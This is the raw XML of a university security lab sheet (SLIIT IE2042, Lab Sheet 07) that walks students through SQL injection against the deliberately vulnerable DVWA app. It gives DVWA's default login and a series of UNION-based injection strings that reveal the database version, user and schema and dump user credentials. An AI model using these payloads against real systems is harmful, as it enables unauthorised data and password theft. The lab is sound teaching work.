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SQL injection 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3274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SQL injection?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does a SQL injection attack work?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is a SQL Injection attack prevented?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Basic SQL Injection Attack using DVWA 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 in to DVWA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Credentials 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93c47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93c47d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username – admin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93c47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93c47d" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password - password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Set the DVWA Security level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DVWA Security, in the left-hand menu.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“low”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211057</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5657850" cy="2401588"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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22972" l="1602" r="3205" t="2630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401588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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SQL Injection Menu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"SQL Injection" from the left navigation menu.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95950" cy="1881350"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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26219" l="5128" r="2564" t="3606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881350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Manual SQL Injection</w:t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Task 01: Basic Injection</w:t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"1" into the text box.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Submit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Note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webpage/code is supposed to print ID, First name, and Surname to the screen.</w:t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211057</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5781675" cy="2253709"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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30163" l="0" r="2724" t="2207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253709"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 02: Always True Scenario</w:t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the below text into the User ID Textbox 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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' or '0'='0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</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5838825" cy="2308041"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="3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 b="21093" l="5128" r="2403" t="2800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308041"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 03: Display Database Version</w:t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the below text into the User ID Textbox.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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' or 0=0 union select null, version() #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291443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2450227"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="1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8167" l="0" r="4487" t="2360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227"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 04 : Display Database User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the below text into the User ID Textbox.</w:t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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' or 0=0 union select null, user() #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409575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5924550" cy="2736666"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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9858" l="0" r="5929" t="2327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736666"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 05: Display Database Name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the below text into the User ID Textbox.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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' or 0=0 union select null, database() #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815013" cy="2552700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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3"/>
                    <a:srcRect b="12236" l="0" r="4326" t="23507"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5815013" cy="2552700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 06: Display all tables in information_schema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the below text into the User ID Textbox.</w:t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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' and 1=0 union select null, table_name from information_schema.tables #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667375" cy="2217553"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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15318" l="4647" r="0" t="3458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217553"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 07: Display all the user tables in information_schema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the below text into the User ID Textbox.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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#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</w:t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895975" cy="1769990"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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 b="20929" l="0" r="801" t="3393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769990"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 08: Display all the columns fields in the information_schema user table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the below text into the User ID Textbox.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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #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</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>400050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5924550" cy="3048000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="11430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 b="11384" l="0" r="2403" t="2264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048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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Task 09 : Display all the columns field contents in the information_schema user table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the below text into the User ID Textbox.</w:t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b6d7a8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #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</w:t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15000" cy="2926347"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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 b="12103" l="1121" r="2724" t="2352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26347"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="FF99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6210300</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>476250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="643106" cy="805050"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
          <wp:docPr id="13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3106" cy="805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Sri Lanka Institute of Information Technology</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
    <w:pPr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Database Management Systems for Security - IE2042</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
    <w:pPr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Lab Sheet 07</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
    <w:pPr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Year 2, Semester 1</w:t>
    </w:r>
  </w:p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  <w:shd w:fill="auto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12.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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image" Target="media/image9.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId16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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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